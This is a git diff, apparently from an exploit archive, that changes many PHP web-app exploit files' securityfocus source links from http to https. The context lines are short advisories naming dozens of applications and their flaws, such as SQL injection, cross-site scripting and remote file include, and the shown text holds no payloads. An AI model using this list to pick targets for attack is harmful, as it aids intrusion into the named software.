b/exploits/php/webapps/27533.txt index 1dad74cdf..4c1be37c8 100644 --- a/exploits/php/webapps/27533.txt +++ b/exploits/php/webapps/27533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17322/info +source: https://www.securityfocus.com/bid/17322/info X-Changer is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27534.txt b/exploits/php/webapps/27534.txt index e0cdedf65..1c975a780 100644 --- a/exploits/php/webapps/27534.txt +++ b/exploits/php/webapps/27534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17323/info +source: https://www.securityfocus.com/bid/17323/info MediaSlash Gallery is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27535.txt b/exploits/php/webapps/27535.txt index 73b827643..5e96dbf99 100644 --- a/exploits/php/webapps/27535.txt +++ b/exploits/php/webapps/27535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17324/info +source: https://www.securityfocus.com/bid/17324/info Oxygen is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27537.txt b/exploits/php/webapps/27537.txt index 94bd08feb..16eed39e0 100644 --- a/exploits/php/webapps/27537.txt +++ b/exploits/php/webapps/27537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17334/info +source: https://www.securityfocus.com/bid/17334/info Warcraft III Replay Parser for PHP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27538.txt b/exploits/php/webapps/27538.txt index 090293ed3..76cffb299 100644 --- a/exploits/php/webapps/27538.txt +++ b/exploits/php/webapps/27538.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17336/info +source: https://www.securityfocus.com/bid/17336/info RedCMS is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27539.txt b/exploits/php/webapps/27539.txt index 6477b21b1..f72ddda6a 100644 --- a/exploits/php/webapps/27539.txt +++ b/exploits/php/webapps/27539.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17336/info +source: https://www.securityfocus.com/bid/17336/info RedCMS is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27540.txt b/exploits/php/webapps/27540.txt index 83c10011c..e878d47da 100644 --- a/exploits/php/webapps/27540.txt +++ b/exploits/php/webapps/27540.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17336/info +source: https://www.securityfocus.com/bid/17336/info RedCMS is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27541.txt b/exploits/php/webapps/27541.txt index fe03e7bb7..15deaea70 100644 --- a/exploits/php/webapps/27541.txt +++ b/exploits/php/webapps/27541.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17338/info +source: https://www.securityfocus.com/bid/17338/info DbbS is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27542.txt b/exploits/php/webapps/27542.txt index 8a3d97716..2120338cf 100644 --- a/exploits/php/webapps/27542.txt +++ b/exploits/php/webapps/27542.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17339/info +source: https://www.securityfocus.com/bid/17339/info Softbiz Image Gallery is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27543.txt b/exploits/php/webapps/27543.txt index 4021350fe..a4b76ad42 100644 --- a/exploits/php/webapps/27543.txt +++ b/exploits/php/webapps/27543.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17339/info +source: https://www.securityfocus.com/bid/17339/info Softbiz Image Gallery is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27544.txt b/exploits/php/webapps/27544.txt index 0b3425a15..5448cd99e 100644 --- a/exploits/php/webapps/27544.txt +++ b/exploits/php/webapps/27544.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17339/info +source: https://www.securityfocus.com/bid/17339/info Softbiz Image Gallery is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27545.txt b/exploits/php/webapps/27545.txt index b2f9bcdd1..e844488a0 100644 --- a/exploits/php/webapps/27545.txt +++ b/exploits/php/webapps/27545.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17339/info +source: https://www.securityfocus.com/bid/17339/info Softbiz Image Gallery is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27546.txt b/exploits/php/webapps/27546.txt index 8db030c80..a689fb6de 100644 --- a/exploits/php/webapps/27546.txt +++ b/exploits/php/webapps/27546.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17339/info +source: https://www.securityfocus.com/bid/17339/info Softbiz Image Gallery is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27548.txt b/exploits/php/webapps/27548.txt index 74333d8fa..60c3f3016 100644 --- a/exploits/php/webapps/27548.txt +++ b/exploits/php/webapps/27548.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17343/info +source: https://www.securityfocus.com/bid/17343/info Claroline is prone to an information-disclosure vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27549.txt b/exploits/php/webapps/27549.txt index 5ca1b9f17..d6b67f0ed 100644 --- a/exploits/php/webapps/27549.txt +++ b/exploits/php/webapps/27549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17344/info +source: https://www.securityfocus.com/bid/17344/info Claroline is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27550.txt b/exploits/php/webapps/27550.txt index a4113ffd1..a4773f927 100644 --- a/exploits/php/webapps/27550.txt +++ b/exploits/php/webapps/27550.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17345/info +source: https://www.securityfocus.com/bid/17345/info Blank'N'Berg is prone to a directory-traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27551.txt b/exploits/php/webapps/27551.txt index fcac7b5bc..48b5ffa1b 100644 --- a/exploits/php/webapps/27551.txt +++ b/exploits/php/webapps/27551.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17346/info +source: https://www.securityfocus.com/bid/17346/info Blank'N'Berg is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27557.pl b/exploits/php/webapps/27557.pl index 24c9322c2..faee0ef96 100755 --- a/exploits/php/webapps/27557.pl +++ b/exploits/php/webapps/27557.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17348/info +source: https://www.securityfocus.com/bid/17348/info Submit-A-Link is prone to an HTML-injection vulnerability. The script fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27560.txt b/exploits/php/webapps/27560.txt index 457f8cfdb..97e8b8a72 100644 --- a/exploits/php/webapps/27560.txt +++ b/exploits/php/webapps/27560.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17352/info +source: https://www.securityfocus.com/bid/17352/info aWebBB is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27563.txt b/exploits/php/webapps/27563.txt index 4d76974ea..50f11a340 100644 --- a/exploits/php/webapps/27563.txt +++ b/exploits/php/webapps/27563.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17360/info +source: https://www.securityfocus.com/bid/17360/info LucidCMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27567.txt b/exploits/php/webapps/27567.txt index a6c4cc294..000d5f5c1 100644 --- a/exploits/php/webapps/27567.txt +++ b/exploits/php/webapps/27567.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17375/info +source: https://www.securityfocus.com/bid/17375/info ArabPortal is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27570.txt b/exploits/php/webapps/27570.txt index 76d017c6c..620b023a1 100644 --- a/exploits/php/webapps/27570.txt +++ b/exploits/php/webapps/27570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17387/info +source: https://www.securityfocus.com/bid/17387/info N.T. is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27571.txt b/exploits/php/webapps/27571.txt index 6c04cd9c7..076435b83 100644 --- a/exploits/php/webapps/27571.txt +++ b/exploits/php/webapps/27571.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17389/info +source: https://www.securityfocus.com/bid/17389/info SKForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27572.txt b/exploits/php/webapps/27572.txt index 689077a6c..caabceeb8 100644 --- a/exploits/php/webapps/27572.txt +++ b/exploits/php/webapps/27572.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17389/info +source: https://www.securityfocus.com/bid/17389/info SKForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27573.txt b/exploits/php/webapps/27573.txt index 3d719707d..3858abadd 100644 --- a/exploits/php/webapps/27573.txt +++ b/exploits/php/webapps/27573.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17389/info +source: https://www.securityfocus.com/bid/17389/info SKForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27574.txt b/exploits/php/webapps/27574.txt index f588bb796..ce22d7b9e 100644 --- a/exploits/php/webapps/27574.txt +++ b/exploits/php/webapps/27574.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17391/info +source: https://www.securityfocus.com/bid/17391/info BASE is prone to a cross-site scripting vulnerability. The application fails to properly sanitize user-supplied input in the 'PrintFreshPage' function. diff --git a/exploits/php/webapps/27575.txt b/exploits/php/webapps/27575.txt index 23162a3e4..34c4b3bea 100644 --- a/exploits/php/webapps/27575.txt +++ b/exploits/php/webapps/27575.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17394/info +source: https://www.securityfocus.com/bid/17394/info MD News is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27576.txt b/exploits/php/webapps/27576.txt index f382ed30e..86d2202a3 100644 --- a/exploits/php/webapps/27576.txt +++ b/exploits/php/webapps/27576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17399/info +source: https://www.securityfocus.com/bid/17399/info MAXDEV CMS is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27578.txt b/exploits/php/webapps/27578.txt index 96b0245f3..56a7d5287 100644 --- a/exploits/php/webapps/27578.txt +++ b/exploits/php/webapps/27578.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17405/info +source: https://www.securityfocus.com/bid/17405/info Jupiter CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27579.txt b/exploits/php/webapps/27579.txt index cc7437a0e..a68fcabc9 100644 --- a/exploits/php/webapps/27579.txt +++ b/exploits/php/webapps/27579.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17406/info +source: https://www.securityfocus.com/bid/17406/info Bitweaver CMS is prone to multiple cross-site scripting vulnerabilities. Thess issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27580.txt b/exploits/php/webapps/27580.txt index ce838a4c2..63afb4ad2 100644 --- a/exploits/php/webapps/27580.txt +++ b/exploits/php/webapps/27580.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17407/info +source: https://www.securityfocus.com/bid/17407/info vBulletin is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27582.txt b/exploits/php/webapps/27582.txt index b23da7546..1b49f39cb 100644 --- a/exploits/php/webapps/27582.txt +++ b/exploits/php/webapps/27582.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17416/info +source: https://www.securityfocus.com/bid/17416/info AWeb's Banner Generator is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27584.txt b/exploits/php/webapps/27584.txt index 93eeaee2e..812389365 100644 --- a/exploits/php/webapps/27584.txt +++ b/exploits/php/webapps/27584.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17419/info +source: https://www.securityfocus.com/bid/17419/info JBook is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27585.txt b/exploits/php/webapps/27585.txt index e88d36de6..451a78d55 100644 --- a/exploits/php/webapps/27585.txt +++ b/exploits/php/webapps/27585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17420/info +source: https://www.securityfocus.com/bid/17420/info phpMyForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27586.txt b/exploits/php/webapps/27586.txt index f3ca65145..d223ddb59 100644 --- a/exploits/php/webapps/27586.txt +++ b/exploits/php/webapps/27586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17420/info +source: https://www.securityfocus.com/bid/17420/info phpMyForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27587.txt b/exploits/php/webapps/27587.txt index eb058d491..d70c1f948 100644 --- a/exploits/php/webapps/27587.txt +++ b/exploits/php/webapps/27587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17421/info +source: https://www.securityfocus.com/bid/17421/info PHPWebGallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27588.txt b/exploits/php/webapps/27588.txt index 252210768..479097cbb 100644 --- a/exploits/php/webapps/27588.txt +++ b/exploits/php/webapps/27588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17421/info +source: https://www.securityfocus.com/bid/17421/info PHPWebGallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27589.txt b/exploits/php/webapps/27589.txt index e201ab446..b053204c6 100644 --- a/exploits/php/webapps/27589.txt +++ b/exploits/php/webapps/27589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17423/info +source: https://www.securityfocus.com/bid/17423/info SPIP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27590.txt b/exploits/php/webapps/27590.txt index f389dab9a..9ed269cfa 100644 --- a/exploits/php/webapps/27590.txt +++ b/exploits/php/webapps/27590.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17425/info +source: https://www.securityfocus.com/bid/17425/info APT-webshop is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27591.txt b/exploits/php/webapps/27591.txt index 59d74d3d8..98d8aead5 100644 --- a/exploits/php/webapps/27591.txt +++ b/exploits/php/webapps/27591.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17430/info +source: https://www.securityfocus.com/bid/17430/info Shadowed Portal is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27592.txt b/exploits/php/webapps/27592.txt index 6ea32fb9f..72185e64a 100644 --- a/exploits/php/webapps/27592.txt +++ b/exploits/php/webapps/27592.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17431/info +source: https://www.securityfocus.com/bid/17431/info SIRE is prone to an arbitrary file-upload vulnerability. diff --git a/exploits/php/webapps/27593.txt b/exploits/php/webapps/27593.txt index b970be968..d0fb86a2c 100644 --- a/exploits/php/webapps/27593.txt +++ b/exploits/php/webapps/27593.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17433/info +source: https://www.securityfocus.com/bid/17433/info VegaDNS is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27612.txt b/exploits/php/webapps/27612.txt index f2331c620..59123ac7f 100644 --- a/exploits/php/webapps/27612.txt +++ b/exploits/php/webapps/27612.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17441/info +source: https://www.securityfocus.com/bid/17441/info ShopWeezle is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27613.txt b/exploits/php/webapps/27613.txt index 9ca406c24..36941a444 100644 --- a/exploits/php/webapps/27613.txt +++ b/exploits/php/webapps/27613.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17441/info +source: https://www.securityfocus.com/bid/17441/info ShopWeezle is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27614.txt b/exploits/php/webapps/27614.txt index 692b9fd87..fbd4873a0 100644 --- a/exploits/php/webapps/27614.txt +++ b/exploits/php/webapps/27614.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17441/info +source: https://www.securityfocus.com/bid/17441/info ShopWeezle is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27615.txt b/exploits/php/webapps/27615.txt index 74e2e3f73..9ea512330 100644 --- a/exploits/php/webapps/27615.txt +++ b/exploits/php/webapps/27615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17447/info +source: https://www.securityfocus.com/bid/17447/info AzDGVote is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27616.txt b/exploits/php/webapps/27616.txt index 3bdcb75e6..3eb64b543 100644 --- a/exploits/php/webapps/27616.txt +++ b/exploits/php/webapps/27616.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17449/info +source: https://www.securityfocus.com/bid/17449/info JetPhoto is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27617.txt b/exploits/php/webapps/27617.txt index 94f741dce..8d3cb82e5 100644 --- a/exploits/php/webapps/27617.txt +++ b/exploits/php/webapps/27617.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17449/info +source: https://www.securityfocus.com/bid/17449/info JetPhoto is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27618.txt b/exploits/php/webapps/27618.txt index 3b4f04e2b..4fc065412 100644 --- a/exploits/php/webapps/27618.txt +++ b/exploits/php/webapps/27618.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17449/info +source: https://www.securityfocus.com/bid/17449/info JetPhoto is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27619.txt b/exploits/php/webapps/27619.txt index 6b98b06e9..56f8fae82 100644 --- a/exploits/php/webapps/27619.txt +++ b/exploits/php/webapps/27619.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17449/info +source: https://www.securityfocus.com/bid/17449/info JetPhoto is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27621.txt b/exploits/php/webapps/27621.txt index d92634c58..0cf44d2d6 100644 --- a/exploits/php/webapps/27621.txt +++ b/exploits/php/webapps/27621.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17461/info +source: https://www.securityfocus.com/bid/17461/info Clever Copy is prone to an information-disclosure vulnerability. A remote attacker could leverage this issue to gain access to sensitive configuration information. The attacker could then use this information to launch further attacks against the system. diff --git a/exploits/php/webapps/27622.txt b/exploits/php/webapps/27622.txt index 455cddd65..5015a5c4e 100644 --- a/exploits/php/webapps/27622.txt +++ b/exploits/php/webapps/27622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17463/info +source: https://www.securityfocus.com/bid/17463/info Dokeos is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27623.txt b/exploits/php/webapps/27623.txt index 8486ceef3..ee39ebbd4 100644 --- a/exploits/php/webapps/27623.txt +++ b/exploits/php/webapps/27623.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17466/info +source: https://www.securityfocus.com/bid/17466/info Confixx is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27624.txt b/exploits/php/webapps/27624.txt index 4622e433c..b9edc2d38 100644 --- a/exploits/php/webapps/27624.txt +++ b/exploits/php/webapps/27624.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17467/info +source: https://www.securityfocus.com/bid/17467/info PHPKIT is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27625.txt b/exploits/php/webapps/27625.txt index da539cd30..9236e6c9c 100644 --- a/exploits/php/webapps/27625.txt +++ b/exploits/php/webapps/27625.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17470/info +source: https://www.securityfocus.com/bid/17470/info The 'indexu' application is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27626.txt b/exploits/php/webapps/27626.txt index f4c8a07a1..1721571f5 100644 --- a/exploits/php/webapps/27626.txt +++ b/exploits/php/webapps/27626.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17473/info +source: https://www.securityfocus.com/bid/17473/info Tritanium Bulletin Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27628.txt b/exploits/php/webapps/27628.txt index 0a927e02f..23846d434 100644 --- a/exploits/php/webapps/27628.txt +++ b/exploits/php/webapps/27628.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17476/info +source: https://www.securityfocus.com/bid/17476/info Confixx is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27629.txt b/exploits/php/webapps/27629.txt index 10a7cd327..f54e02d4f 100644 --- a/exploits/php/webapps/27629.txt +++ b/exploits/php/webapps/27629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17483/info +source: https://www.securityfocus.com/bid/17483/info Chipmunk Guestbook is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27632.txt b/exploits/php/webapps/27632.txt index 6df9eb986..57926facc 100644 --- a/exploits/php/webapps/27632.txt +++ b/exploits/php/webapps/27632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17487/info +source: https://www.securityfocus.com/bid/17487/info PHPMyAdmin is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27633.txt b/exploits/php/webapps/27633.txt index 0fcbc36d5..f48958376 100644 --- a/exploits/php/webapps/27633.txt +++ b/exploits/php/webapps/27633.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17492/info +source: https://www.securityfocus.com/bid/17492/info MyBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27634.txt b/exploits/php/webapps/27634.txt index 882e69c2b..e7d891f8b 100644 --- a/exploits/php/webapps/27634.txt +++ b/exploits/php/webapps/27634.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17495/info +source: https://www.securityfocus.com/bid/17495/info PatroNet CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27638.pl b/exploits/php/webapps/27638.pl index f1129814c..b359fe3b9 100755 --- a/exploits/php/webapps/27638.pl +++ b/exploits/php/webapps/27638.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17501/info +source: https://www.securityfocus.com/bid/17501/info SimpleBBS is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27642.txt b/exploits/php/webapps/27642.txt index 81129739b..f34bc8a88 100644 --- a/exploits/php/webapps/27642.txt +++ b/exploits/php/webapps/27642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17522/info +source: https://www.securityfocus.com/bid/17522/info The ar-blog application is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27643.php b/exploits/php/webapps/27643.php index e16ddb096..406c1b4d4 100644 --- a/exploits/php/webapps/27643.php +++ b/exploits/php/webapps/27643.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17526/info +source: https://www.securityfocus.com/bid/17526/info phpAlbum is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27644.txt b/exploits/php/webapps/27644.txt index b9722a5d6..9f30cb724 100644 --- a/exploits/php/webapps/27644.txt +++ b/exploits/php/webapps/27644.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17527/info +source: https://www.securityfocus.com/bid/17527/info PlanetSearch + is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27645.txt b/exploits/php/webapps/27645.txt index 8abad3e1a..2176a8f63 100644 --- a/exploits/php/webapps/27645.txt +++ b/exploits/php/webapps/27645.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17528/info +source: https://www.securityfocus.com/bid/17528/info PowerClan is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27646.txt b/exploits/php/webapps/27646.txt index 7c7ff13e7..8518d09d6 100644 --- a/exploits/php/webapps/27646.txt +++ b/exploits/php/webapps/27646.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17529/info +source: https://www.securityfocus.com/bid/17529/info LifeType is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27647.txt b/exploits/php/webapps/27647.txt index 5fbe862fe..5c15f534d 100644 --- a/exploits/php/webapps/27647.txt +++ b/exploits/php/webapps/27647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17530/info +source: https://www.securityfocus.com/bid/17530/info Papoo is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27648.txt b/exploits/php/webapps/27648.txt index 7211e9f31..9bee979c8 100644 --- a/exploits/php/webapps/27648.txt +++ b/exploits/php/webapps/27648.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17532/info +source: https://www.securityfocus.com/bid/17532/info MODxCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27649.txt b/exploits/php/webapps/27649.txt index 2b247fe9b..7b69092f8 100644 --- a/exploits/php/webapps/27649.txt +++ b/exploits/php/webapps/27649.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17533/info +source: https://www.securityfocus.com/bid/17533/info MODxCMS is prone to a directory-traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27650.txt b/exploits/php/webapps/27650.txt index 2dc38df9d..2bfa66465 100644 --- a/exploits/php/webapps/27650.txt +++ b/exploits/php/webapps/27650.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17534/info +source: https://www.securityfocus.com/bid/17534/info FarsiNews is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27651.txt b/exploits/php/webapps/27651.txt index 7c7140649..7d36ccdde 100644 --- a/exploits/php/webapps/27651.txt +++ b/exploits/php/webapps/27651.txt 